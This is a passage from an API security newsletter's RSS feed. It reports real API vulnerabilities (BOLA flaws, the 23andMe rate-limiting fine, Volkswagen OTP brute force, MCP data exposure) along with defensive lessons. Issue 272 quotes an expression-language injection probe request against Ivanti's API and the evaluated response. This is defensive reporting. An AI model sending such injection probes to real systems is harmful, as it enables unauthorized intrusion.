<p style="font-weight: 400;"><span style="font-weight: 400;">This is one of many reasons why maintaining public documentation for an API has value both for API integration </span><i><span style="font-weight: 400;">and</span></i><span style="font-weight: 400;"> security. If APIs are delivered along with well-maintained documentation, consumers can routinely test their dependency APIs for drift, which provides teams with an early warning of breaking changes or emerging vulnerabilities in dependency APIs and supply chains.</span></p>
<h2><span style="font-weight: 400;">Industry Events: Nordic APIs Security Unconference, October 13 </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Coming in October, Nordic APIs will host an API Security UnConference in the beautiful city of Stockholm, covering topics like API access and identity management, OAuth and OpenID Connect, securing AI agents, governance and monitoring, documentation strategies, sector-specific standards, and more.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Unlike traditional conferences, the </span><b>unconference</b><span style="font-weight: 400;"> format promotes open, participant-driven discussions, spontaneous idea-sharing and real-world problem-solving among peers.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Sounds like a great opportunity to connect with fellow API security professionals and dive deep into current challenges and solutions.</span></p>
<p><span style="font-weight: 400;">Check out the </span><a style="font-weight: 400;" href="https://www.abc27.com/business/press-releases/ein-presswire/827244088/nordic-apis-launches-api-security-unconference-on-october-13-ahead-of-platform-summit/" target="_blank" rel="noopener"><span style="font-weight: 400;">press release</span></a><span style="font-weight: 400;"> for more information about the event.</span></p>
<p>The post <a href="https://apisecurity.io/issue-275-api-hackers-strike-gold-malicious-api-drift-at-coinmarketcap-survey-reveals-major-api-security-gaps/">Issue 275: API hackers strike gold, Malicious API drift at CoinMarketCap, Survey reveals major API security gaps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 274: Authorization nightmares, API security case studies, 23andMe fined £2.3M, OAuth for Cloud Native APIs</title>
		<link>https://apisecurity.io/issue-274-authorization-nightmares-api-security-case-studies-23andme-fined-2-3m-oauth-for-cloud-native-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 19 Jun 2025 15:14:03 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11329</guid>

					<description><![CDATA[<p>This week, the theme is API authorization gone wrong. Guest contributor Rob Spectre kicks off a new interview series exploring real-world authorization failures. We also dive into case studies with key lessons for API security teams, including a look at the missteps that led to a £2.3M fine for 23andMe, and data exposure from the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-274-authorization-nightmares-api-security-case-studies-23andme-fined-2-3m-oauth-for-cloud-native-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-274-authorization-nightmares-api-security-case-studies-23andme-fined-2-3m-oauth-for-cloud-native-apis/">Issue 274: Authorization nightmares, API security case studies, 23andMe fined £2.3M, OAuth for Cloud Native APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, the theme is API authorization gone wrong. Guest contributor Rob Spectre kicks off a new interview series exploring real-world authorization failures. We also dive into case studies with key lessons for API security teams, including a look at the missteps that led to a £2.3M fine for 23andMe, and data exposure from the Asana MCP. Finally, we highlight a new resource on securing OAuth for cloud native APIs.</span></p>
<h2><span style="font-weight: 400;">Case Study: True Nightmares of Authorization</span></h2>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">By guest contributor </span></i><b><i>Rob Spectre</i></b><i><span style="font-weight: 400;">, DevRel at Oso.</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It&#8217;s 5:45pm on a Friday. A small uptick in HTTP 400s and 500s pops up on an internal customer management tool. Within the hour, the entire engineering team at a hypergrowth startup scrambles to respond to a security intrusion &#8211; one that this technical leader will never forget. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Oso kicks off a new series called &#8220;True Nightmares of Authorization&#8221; in interviews with engineering and product professionals about some of the worst moments of their careers. The details and identities are kept confidential, but the stories &#8211; and the months of pain that followed &#8211; are real. Read the first one &#8211; </span><a href="https://www.osohq.com/post/nightmares-of-authorization-pwned-password-data-pilferer" target="_blank" rel="noopener"><span style="font-weight: 400;">The tale of the Pwned Password Pilferer</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Case Study: JWT Validation &amp; Unauthorized Payments </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Real-world incidents highlight why API security matters and can help to avoid repeating the costs and pains other API teams experienced as a result of a vulnerability. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The RSAC article by <span class="msg-s-message-group__profile-link msg-s-message-group__name t-14 t-black t-bold hoverable-link-text">Ravi Teja Thutari</span> “</span><a href="https://www.rsaconference.com/library/blog/three-outages-that-changed-how-we-think-about-api-security" target="_blank" rel="noopener"><span style="font-weight: 400;">Three Outages That Changed How We Think About API Security</span></a><span style="font-weight: 400;">” does exactly that, similar to the Oso series, by focusing on impact and lessons learned.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the first case, a payments API failed to properly validate JWT access tokens due to a </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa8-security-misconfiguration/" target="_blank" rel="noopener"><span style="font-weight: 400;">misconfiguration</span></a><span style="font-weight: 400;"> in an API Gateway. It’s a classic example of how a simple change can expose a serious vulnerability and highlights why </span><b>defense-in-depth </b><span style="font-weight: 400;">is crucial</span><b>.</b><span style="font-weight: 400;"> </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The second case involved an API bug that led to a service outage and denial-of-service (DOS).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While edge devices like gateways provide general rate-limiting, APIs often require more fine-grained protections tailored to the specific service they expose. For example, Auth APIs are often a target of brute-force attacks on login or one-time-password validation services, and benefit from tighter, API-specific restrictions. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article contains some really useful insights, worth a read!</span></p>
<h2><span style="font-weight: 400;">Article: 23andMe Fined £2.3M over API Breach</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Still on API rate-limiting: the Guardian </span><a href="https://www.theguardian.com/technology/2025/jun/17/dna-testing-firm-23andme-fined-23m-by-uk-regulator-for-2023-data-hack" target="_blank" rel="noopener"><span style="font-weight: 400;">reports</span></a><span style="font-weight: 400;"> that the UKs Information Commissioners Office (ICO) has fined genetic testing company 23andMe </span><b>£2.3 million</b><span style="font-weight: 400;"> for a 2023 data breach.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A threat actor used a credential stuffing attack against a login API, using stolen credentials to exfiltrate the private data of over 155,000 UK residents. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Delving into the ICO’s </span><a href="https://ico.org.uk/media2/kclbljpo/23andme-penalty-notice.pdf" target="_blank" rel="noopener"><span style="font-weight: 400;">Penalty Notice</span></a><span style="font-weight: 400;">, the company was primarily fined for inadequate security, lacking multi-factor authentication and, in particular, ineffective rate-limiting rules and alerts:</span></p>
<blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">“organisations should ensure that they are rate-limiting or throttling the number and frequency of incorrect login attempts… limiting to a certain number per hour, day and month is a good idea.”</span></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">23andMe did apply IP-based rate limits, but this is (and was) easily bypassed using rotating IP addresses. More elaborate API security policies are needed, such as tracking login attempts per user and using device fingerprinting. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Behavioral analytics can also help flag unusual activity, but this approach tends to only react after suspicious activity emerges over time, making it useful for long-term damage limitation rather than stopping an attack early in real time. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Notably, 23andMe filed for bankruptcy protection in the US earlier this year.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Bykea API Exposed by Classic BOLA Vulnerability</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Strengthening the case for its top spot on the OWASP API Security Top 10, another Broken Object Level Authorization (BOLA) vulnerability has been </span><a href="https://hackerone.com/reports/2374730" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;">, this time in an API belonging to ride-hailing and logistics company Bykea. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The security researcher provides a clear and well-documented walkthrough of the vulnerability and exploit, setting up “victim” and “attack” accounts to show how an attacker can easily access a victim&#8217;s data when API developers fail to implement proper object-level authorization checks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a nutshell, API developers must ensure that every request to access a resource includes a check to confirm the authenticated user has permission to access that specific object. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">BOLA, a post-authentication vulnerability, is one of the most common and dangerous API vulnerabilities. Reducing the risk means raising developer awareness of secure coding practices, and QA teams adding identity-based automated tests to catch these security issues before production.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One to watch out for.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Asana’s MCP Data Exposure</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Staying on the topic of resource-based authorization: in the last issue of </span><a href="https://apisecurity.io/issue-273-dangers-from-ai-hype-top-owasp-threats-in-action-emerging-mcp-risks/#:~:text=Vulnerability%3A%20Does%20MCP%20pave%20over%20the%20cracks%20in%20API%20security%3F" target="_blank" rel="noopener"><span style="font-weight: 400;">APISecurity.io</span></a><span style="font-weight: 400;"> we looked at the expanding usage of Model Context Protocol (MCP) to extend the capabilities of AI agents and servers through APIs, and its inherent risks from authorization vulnerabilities. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This week, Upguard </span><a href="https://www.upguard.com/blog/asana-discloses-data-exposure-bug-in-mcp-server" target="_blank" rel="noopener"><span style="font-weight: 400;">reports</span></a><span style="font-weight: 400;"> a case of potential data exposure in Asana’s MCP server, where a bug may have exposed private data to other Asana users and organizations. As it is with API security, least privilege access will be a key concern when it comes to adopting and integrating MCP.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The MCP specification recommends OAuth for authorization. A section on ‘</span><a href="https://modelcontextprotocol.io/specification/draft/basic/security_best_practices#terminology" target="_blank" rel="noopener"><span style="font-weight: 400;">Security Best Practices</span></a><span style="font-weight: 400;">’ describes and illustrates authorization flows between MCP clients and servers, third-party APIs and Authorization servers. It also outlines potential attacks targeting MCP implementations and recommended security measures. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Asana incident doesn’t appear to be the result of an attack, rather an implementation bug that leaked unauthorized user data. Which may highlight the steep security challenges teams face with MCP adoption, including safe and secure implementation of OAuth-based flows. </span></p>
<h2><span style="font-weight: 400;">Resource: Cloud Native Data Security with OAuth</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, this week, here’s a valuable new resource for anyone working on API security: </span><a href="https://curity.io/resources/documents/cloud-native-data-security-oauth/" target="_blank" rel="noopener"><span style="font-weight: 400;">Cloud Native Data Security with OAuth</span></a><span style="font-weight: 400;">. The book by the team at Curity describes steps to implement OAuth, and outlines how access tokens, scopes and claims can be used for secure, fine-grained API authorization. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I’ve been referencing it recently while configuring authorization workflows and found it very useful, both as a refresher on core concepts and for understanding some of the more advanced aspects of securing cloud-native APIs across microservices or Kubernetes clusters. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Authorization issues remain one of the most persistent challenges for API teams, and more so now as new protocols like MCP enter the picture. As highlighted again in The New Stack’s </span><a href="https://thenewstack.io/the-model-context-protocol-security-reality-check/" target="_blank" rel="noopener"><span style="font-weight: 400;">recent article</span></a><span style="font-weight: 400;">, OAuth plays a foundational role in securing AI agents that interact with APIs and services via MCP. Without securely designed APIs and well-implemented OAuth flows, there&#8217;s a real risk of data exposure, especially as LLMs start to access sensitive organization data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This book is certainly one I’ll be adding to my API security library, highly recommended. </span></p>
<p>The post <a href="https://apisecurity.io/issue-274-authorization-nightmares-api-security-case-studies-23andme-fined-2-3m-oauth-for-cloud-native-apis/">Issue 274: Authorization nightmares, API security case studies, 23andMe fined £2.3M, OAuth for Cloud Native APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 273: Dangers from AI Hype, Top OWASP Threats in Action, Emerging MCP Risks</title>
		<link>https://apisecurity.io/issue-273-dangers-from-ai-hype-top-owasp-threats-in-action-emerging-mcp-risks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 05 Jun 2025 15:02:12 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[GenAI]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11325</guid>

					<description><![CDATA[<p>This week, we dive into an unusual case of humans spoofing AI. We also examine three real-world API incidents of OWASP API Security Top 10 vulnerabilities. Plus, we share insights from a new industry report on rising API attack trends and explore how GitHub’s MCP vulnerability may signal a new set of authorization challenges to [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-273-dangers-from-ai-hype-top-owasp-threats-in-action-emerging-mcp-risks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-273-dangers-from-ai-hype-top-owasp-threats-in-action-emerging-mcp-risks/">Issue 273: Dangers from AI Hype, Top OWASP Threats in Action, Emerging MCP Risks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we dive into an unusual case of humans spoofing AI. We also examine three real-world API incidents of OWASP API Security Top 10 vulnerabilities. Plus, we share insights from a new industry report on rising API attack trends and explore how GitHub’s MCP vulnerability may signal a new set of authorization challenges to come.</span></p>
<h2><span style="font-weight: 400;">Article: Heavy on artificial, light on intelligence</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://techfundingnews.com/fake-it-till-you-unicorn-builder-ais-natasha-was-never-ai-just-700-indian-coders-behind-the-curtain/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> about Builder.ai, a startup alleged to have falsely marketed its product &#8220;Natasha&#8221; as an autonomous AI software developer, is a clear warning about the dangers of AI hype. Despite the company&#8217;s public claims of delivering an AI-driven software generation service, it was actually a team of 700 human developers behind the scenes doing the work.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The incident exposes a deep industry problem: the wildly unrealistic expectations placed on AI. Even leading AI companies are more realistic about AI’s limitations. For example, in a recent article “</span><a href="https://techcrunch.com/2025/06/03/anthropics-ai-is-writing-its-own-blog-with-human-oversight/" target="_blank" rel="noopener"><span style="font-weight: 400;">Anthropic’s AI is writing its own blog — with human oversight</span></a><span style="font-weight: 400;">”, Anthrophic admits using experts to review AI output before publishing even a blog post!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So the idea that AI is ready to autonomously write complex production-ready software, or for that matter to automatically secure API transactions in real-time, without human oversight is, frankly, pure fantasy. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">AI can be a tool for developers, not a replacement for developers. As this incident shows, it’s time to ground discussions about AI in reality. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Mozilla API flaw allows malicious account deletion</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A security researcher ethically </span><a href="https://hackerone.com/reports/3154983" target="_blank" rel="noopener"><span style="font-weight: 400;">disclosed</span></a><span style="font-weight: 400;"> a high severity vulnerability discovered in Mozilla’s account deletion API. The flaw allowed an authenticated user to delete other user’s accounts simply by substituting their email address in the API request. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a textbook case of Broken Object level authorization (BOLA), the top-ranked issue on the OWASP API vulnerability list </span><b>(OWASP API 01:2023)</b><span style="font-weight: 400;">. BOLA occurs when the developer fails to properly check if a user is authorized to access or manipulate a specific resource. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For API authorization, it&#8217;s often not enough to verify the user’s authentication and role; developers must ensure the user is also authorized for the specific resource being requested. Without that important check in the API code, a threat actor can exploit the API by changing object identifiers in the API request, such as email addresses or user IDs, to point to another user’s resources. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Mozilla awarded the researcher a $6,000 bug bounty, highlighting the importance of testing for proper authorization checks during API development. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: 50,000 Azure AD users exposed via unsecured API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers </span><a href="https://www.cloudsek.com/blog/50-000-azure-ad-users-exposed-via-unsecured-api-bevigil-uncovers-critical-flaw" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> an unsecured API endpoint exposing data on over 50,000 employees at a major aviation company. The API issued access tokens for Microsoft Graph without requiring authentication </span><b>(OWASP API 02:2023)</b><span style="font-weight: 400;">, allowing anyone to query the company’s Microsoft Graph APIs and retrieve employee records and identity data. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerable API was embedded in a public Javascript file, and developers may have assumed the API didn’t require authentication because it was only intended for use by a trusted web client. But as we previously highlighted for similar cases (Issue 270 “</span><a href="https://apisecurity.io/issue-270-ai-double-agents-securing-api-access-openapi-driven-mcp-apis-expose-33000-employees/#:~:text=Vulnerability%3A%20Unprotected%20APIs%20expose%2033%2C000%20employees" target="_blank" rel="noopener"><span style="font-weight: 400;">Unprotected APIs expose 33,000 employees</span></a><span style="font-weight: 400;">”), it’s trivial for hackers to find these vulnerable APIs on websites and mobile apps, and exploit them. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The key lesson is that all API endpoints must be individually secured, regardless of their intended use. Public-facing APIs are always discoverable and exploitable. API authentication, access control and server-side input validation are essential. Obscurity is certainly not security.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Recruiter emails leaked in API response</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A vulnerability in an API used by Naukri, a popular job search platform in India, exposed the email addresses of recruiters viewing job candidates profiles. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security researcher Lohith Gowda </span><a href="https://www.techradar.com/pro/security/another-top-employment-website-found-exposing-recruiter-email-addresses" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> that when candidate profiles were retrieved, recruiter emails were unnecessarily included in the API response; a classic case of excessive data exposure </span><b>(OWASP API 03:2023)</b><span style="font-weight: 400;">.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While leaking recruiters&#8217; email addresses might seem low-risk, it does reveal sensitive context, such as which recruiters are interested in which candidates. This opens the door to targeted spam, social engineering, or spear phishing campaigns.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Developers are often advised to apply the principle of least privilege when coding an API’s response data, only returning the data strictly required and authorized for the client.</span></p>
<h2><span style="font-weight: 400;">Industry Report: 78% of API attacks happen </span><i><span style="font-weight: 400;">after</span></i><span style="font-weight: 400;"> authentication</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://www.cdnetworks.com/reports/state-of-waap-2024" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by CDNetworks reveals that 78% of API attacks occur after successful authentication. Attackers are using valid credentials, whether through stolen API keys, hijacked sessions, weak passwords, or even newly created accounts, to launch their attacks from inside the target system.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Once a user is authenticated and access is granted, the next line of defense is authorization and API data governance. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Role-based authorization (RBAC) helps to limit what authenticated users can see or do. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Resource-level authorization, such as protections against BOLA vulnerabilities, helps to prevent lateral movement within the system, ensuring users can only access resources explicitly tied to their account. This can significantly reduce the impact of attacks by authenticated users. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report also cites Gartner’s Market Guide for API Protection, which notes that the average </span><i><span style="font-weight: 400;">API </span></i><span style="font-weight: 400;">breach exposes at least 10 times more data than a typical security breach. This increased risk stems from the fact that every API exposes unique data properties, requiring tailored security measures at the API level.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This can be addressed with strong API design and runtime data validation, using developer-defined data schemas to reject unexpected or malformed data, and block common API logic abuse and injection attacks. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Does MCP pave over the cracks in API security?</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The recent GitHub MCP server </span><a href="https://gbhackers.com/critical-github-mcp-server-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">vulnerability</span></a><span style="font-weight: 400;"> highlights a growing and perhaps underappreciated risk: resource-based authorization remains a largely unsolved problem, at both the API layer and now at the emerging abstraction layer introduced by MCP (Model Context Protocol).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs have long struggled with Broken Object Level Authorization (BOLA), where attackers exploit insufficient authorization checks to access private resources. These vulnerabilities are inherently context-specific, and solutions must be customized for each API’s unique data structures, user roles, and business logic.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Just like APIs, authorization in MCPs will be highly context-specific. What an agent should be allowed to access in one scenario may be entirely inappropriate in another. This makes it unlikely that a universal, one-size-fits-all authorization model for MCPs will succeed, just as it doesn’t work for APIs. Instead, both layers will need fine-grained, customized authorization policies. There’s some work to be done by developers here.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As we scale the use of MCPs in AI-driven systems, the industry should ask: Are we solving API authorization vulnerabilities, or simply paving over them with a new surface of AI-native ones?</span></p>
<p>The post <a href="https://apisecurity.io/issue-273-dangers-from-ai-hype-top-owasp-threats-in-action-emerging-mcp-risks/">Issue 273: Dangers from AI Hype, Top OWASP Threats in Action, Emerging MCP Risks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 272: Volkswagen API hacked, API flaws in Instagram &#038; Tiktok, ELi attacks, Radware &#038; Cisco API vulnerabilities</title>
		<link>https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 22 May 2025 13:47:31 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11321</guid>

					<description><![CDATA[<p>This week, we’re sharing five API vulnerability incidents that provide valuable insights into how APIs are commonly hacked and how to prevent these same vulnerabilities in your APIs. These incidents include the exposure of vehicle owner data from Volkswagen&#8217;s mobile app, enumeration vulnerabilities in Instagram and Tiktok APIs, an in-depth look at expression language injection [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/">Issue 272: Volkswagen API hacked, API flaws in Instagram &#038; Tiktok, ELi attacks, Radware &#038; Cisco API vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we’re sharing five API vulnerability incidents that provide valuable insights into how APIs are commonly hacked and how to prevent these same vulnerabilities in your APIs. These incidents include the exposure of vehicle owner data from Volkswagen&#8217;s mobile app, enumeration vulnerabilities in Instagram and Tiktok APIs, an in-depth look at expression language injection attacks, and cases of API vulnerabilities in Radware and Cisco platforms. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Volkswagen Authentication API Exposes OTP</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A security researcher successfully hacked Volkswagen’s mobile app by launching a brute-force attack on an API used to validate a one-time password (OTP). Because the API was not protected by rate limiting, a hacker could send an unlimited number of requests to guess the correct 4-digit OTP code, circumventing the OTP security control for the mobile app to gain access to the target vehicle. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Identifying this vulnerability prompted the researcher to investigate the other APIs used by the mobile app. The </span><a href="https://loopsec.medium.com/hacking-my-car-and-probably-yours-security-flaws-in-volkswagens-app-24b34c47ba89" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> also reveals:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Sensitive data leaked in an API response, including plaintext passwords and secrets.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Any vehicle&#8217;s detailed service history could be retrieved through an API request, requiring only the vehicle&#8217;s VIN (often publicly displayed on the windshield).</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The leaked service history data included personally identifiable information (PII) about the vehicle&#8217;s owner. </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Telemetry data, driver credentials, and driver&#8217;s license numbers were also exposed via other APIs.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">A previous Imperva </span><a href="https://www.imperva.com/resources/resource-library/reports/2024-bad-bot-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> revealed that 44% of account takeover (ATO) attacks in 2024 targeted APIs. This finding is not surprising, as APIs are now widely used for authentication services, such as user credential validation and one-time password validation.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Network devices such as Gateways are often used to provide general protection against brute-force attacks, however Authentication APIs require more granular rate-limiting controls to protect against targeted API attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Note that Volkswagen has now patched these vulnerabilities. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Users exposed by Instagram and Tiktok APIs </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Is your email address associated with an Instagram, Tiktok, or even a business account?</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This type of information is valuable to threat actors, especially in bulk, where it can be used in mass credential stuffing or spear-phishing attacks. Returning to our previous topic on authentication APIs, a recent </span><a href="https://socket.dev/blog/malicious-checker-packages-on-pypi-probe-tiktok-and-instagram" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> highlights the use of malicious “checker” packages that automate requests to Instagram and Tiktok APIs to check which stolen email addresses were associated with an account on these platforms. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A poorly designed authentication API can inadvertently reveal this information due to a discrepancy factor in the API’s response, such as the HTTP error code, the error message, or even the API’s response time.</span></p>
<p style="font-weight: 400; text-align: center;"><strong>HTTP 404 “account not found”  </strong></p>
<p style="font-weight: 400; text-align: center;"><strong>HTTP 401 “invalid credentials”</strong></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These enumeration attacks are common enough that teams should pay attention to OWASP </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;"> on authentication, which recommend APIs respond with a generic error message to avoid exposing a discrepancy factor that could be used to extract information about customers.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API Expression Language Injection Attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Here’s another recent and interesting attack exploiting flaws in an API’s error response!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A watchTowr research team discovered an Expression Language Injection (ELi) vulnerability in the API of Ivanti’s mobile device management (MDM) product. The detailed </span><a href="https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> describes the team&#8217;s vulnerability discovery process, which I highly recommend if you’re technically inclined. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">My TL;DR version: the API unsafely handles malformed user input which is “evaluated” by the backend framework and returned in the error response. In the simplified example below, the user includes the arithmetic operation ‘7*7’ in the ‘format’ query parameter, and the API returns the calculated value ‘49’ in the error response.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Malicious API request:</span></p>
<pre class="line-numbers"><code class="language-json">GET /mifs/admin/rest/api/v2/featureusage?format=watchTowr%24%7b<span style="color: #ff0000;">7*7</span>%7d</code></pre>
<p style="font-weight: 400;"><span style="font-weight: 400;">Exploited API response:</span></p>
<pre class="line-numbers"><code class="language-json">"Format 'watchTowr<span style="color: #ff0000;">49</span>' is invalid. Valid formats are 'json', 'csv'."</code></pre>
<p style="font-weight: 400;"><span style="font-weight: 400;">This confirms that the API is vulnerable to ELi and could be exploited to execute malicious commands on the API server. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident reminds API testers to be wary of APIs that include user input in the response, as they may be vulnerable to similar injection attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Developers can also avoid this vulnerability by designing APIs that return generic error responses to malformed or invalid user requests. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Malicious input bypasses Radware’s WAF </span></h2>
